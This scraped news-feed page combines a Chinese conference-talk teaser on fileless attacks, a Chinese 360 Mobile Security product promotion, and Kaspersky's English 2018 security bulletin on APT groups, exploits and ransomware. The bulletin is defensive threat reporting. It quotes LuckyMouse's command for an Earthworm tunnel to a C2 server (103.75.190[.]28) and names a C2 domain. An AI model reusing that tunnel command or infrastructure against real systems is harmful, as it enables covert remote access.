面对如此“凶残”的网络攻击手法,如何保全自身企业、组织的安全体系已是当前首要的关注点。因此,FIT 2019组委会特邀请广州三零卫士的木星安全实验室总监伍智波(SkyMine),为大家带来《似新非新的“无文件攻击”》议题分享。聊一聊无文件攻击的发展历程,以及当下对网络安全带来的影响。

伍智波(SkyMine),中国网安广州三零卫士的木星安全实验室总监,是KCon、HITB等顶级安全峰会的演讲者,曾主导实施“2018年博鳌亚洲论坛”的红队评估工作以及“2018年广州财富全球论坛”的网络安全保障工作,曾为多个党政军单位和行业客户提供多种安全服务。现今带领由多名国内安全专家组成的“木星安全实验室”,深耕工控安全、IoT安全、红队评估、反间谍、应用安全、数据防泄密、APT事件分析等高级安全服务。


FIT 2019议题前瞻:来去无踪,似新非新的“无文件攻击”丨白帽Live
FIT 2019互联网安全创新大会

CodeSec互联网安全创新大会(FIT)是由国内领先的互联网安全新媒体平台CodeSec.Net主办的年度互联网安全盛会,WitAwards互联网安全颁奖盛典也将同期举行。

FIT 2019大会会期为 2018年12月12日~13日 ,会议将在 上海宝华万豪酒店 举行。本次大会主论坛议程聚焦 「全球高峰会」、「前沿安全神盾局」、「WitAwards颁奖盛典」、「WIT安全创新者联盟」「X-TECH技术派对」、「HACK DEMO」 六大板块,独立分设 「白帽LIVE」「企业安全俱乐部」 两大分论坛,与来自全球的安全从业者、优秀技术专家、企业安全建设者、白帽安全专家、研究机构等共同展开演讲与探讨。同时 「中国首席信息安全官高峰论坛 」、 「漏洞马拉松线下邀请赛」 也将在特色分会场同期举行。此次盛会致力于分享2018年度安全行业创新硕果,共同探索与展望未来安全新边界。

>>>【FIT 2019官网】


FIT 2019议题前瞻:来去无踪,似新非新的“无文件攻击”丨白帽Live

360手机卫士8.0全新上线:号称让微信流畅10倍

$
0
0

12月3日, 360手机卫士8.0正式发布,号称搭载360安全大脑,全面实现骚扰拦截+病毒查杀+文件清理三大功能 。

2018上半年,用户通过360手机卫士标记的各类骚扰电话号码约2943.7万个,平均每天标记骚扰电话16万个。而拦截总量上,360手机卫士已为全国用户识别和拦截各类强扰电话高达195亿次。

为什么360手机卫士8.0的拦截功能如此强大?官方称这是因为它 搭载了全球最大的智能安全防御系统-360安全大脑赋能,同时具备伪基站短信、钓鱼网站、包含木马病毒的链接等识别能力 ,能准确判别各种方式、各种话术、文本形式发到用户手机的垃圾信息, 本地和云端的判别模型的准确率都达到了99%以上 。

病毒查杀方面,2018上半年,360互联网安全中心累计截获安卓平台新增恶意程序300万个,其中新增手机勒素软件近13万个,1-7月截获新增手机挖矿木马4806个。

清理垃圾方面,新版360手机卫士实现手机存储目录超强的识别能力,系统垃圾、缓存垃圾、卸载残留等类别的识别量和准确率均有出色表现, 官方称首次使用可清理垃圾高达2.5G左右。

越来越多的网红视频、搞笑动图留存在手机存储中,造成长时间时候后手机卡慢, 360手机卫士根据网红短视频特征值进行智能识别筛选 ,目前日均识别网红小视频总量高达3000万个。

另外,新版360手机卫士还推出了全新的微信专项清理功能,可从短视频、广告、截屏、表情包、二维码等多维度进行智能识别及筛选,一键清理专项垃圾,号称让你的微信流畅10倍。


360手机卫士8.0全新上线:号称让微信流畅10倍

文章纠错

微信公众号搜索"驱动之家"加关注,每日最新的手机、电脑、汽车、智能硬件信息可以让你一手全掌握。推荐关注!【微信扫描下图可直接关注


360手机卫士8.0全新上线:号称让微信流畅10倍

Kaspersky Security Bulletin 2018. Top security stories

$
0
0
Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported onSlingshot a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat which rivalsRegin andProjectSauron in its complexity during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games.Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website preventing visitors from printing tickets. The attack also affected other organizations in the region for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


Kaspersky Security Bulletin 2018. Top security stories

OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings ofOperation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.


Kaspersky Security Bulletin 2018. Top security stories

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full reporthere, but below is a summary of our findings.

With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data. The diversity of victims may indicate the diversity of the attackers’ interests. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here . Initially, they believed that the malware had infected around 500,000 routers Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at theC2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2 , the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017 , revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports , threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors . We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.


Kaspersky Security Bulletin 2018. Top security stories
In June, we reported an ongoing campaign targeting a national data centre in Central Asia . The choice of target was especially significant it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain ‘update.iaacstudio[.]com’ was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees. We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-windows platforms they included a Mac OS version and the website suggests that a linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeushere.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities , revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak javascript backdoor , new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group . Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

Educate general staff so that they are able to identify malicious behaviour such as phishing links. Educate information security staff to ensure that they have full configuration, investigative and hunting abilities. Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies. Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules. Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.


Kaspersky Security Bulletin 2018. Top security stories

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program calledOctopus, used by DustSquad to target diplomatic bodies in the region the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports , you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis ofDark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsarhere.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of theZoopark,BusyGasper andSkygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system , we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability . The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded an HTML page containing VBScript code. This triggers a UAF ( Use After Free ) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Brower extensions extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. Themalicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows . They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension .

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make moneyhere. We also provided tips on how to avoid phishing scams advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force , dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our reporthere, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money for example, by replacing the banking details in transactions. By the time we published ourreport, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targetshere, and an overview of attacks on ICS systems in the first half of 2018here.

Ransomware still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting theKeyPass Trojan. In just two days, we found this malware in more than 20 countries Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON . If the C2 is unavailable for example, if the infected computer is not connected to the internet, or the server is down the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.


Kaspersky Security Bulletin 2018. Top security stories

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years .

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

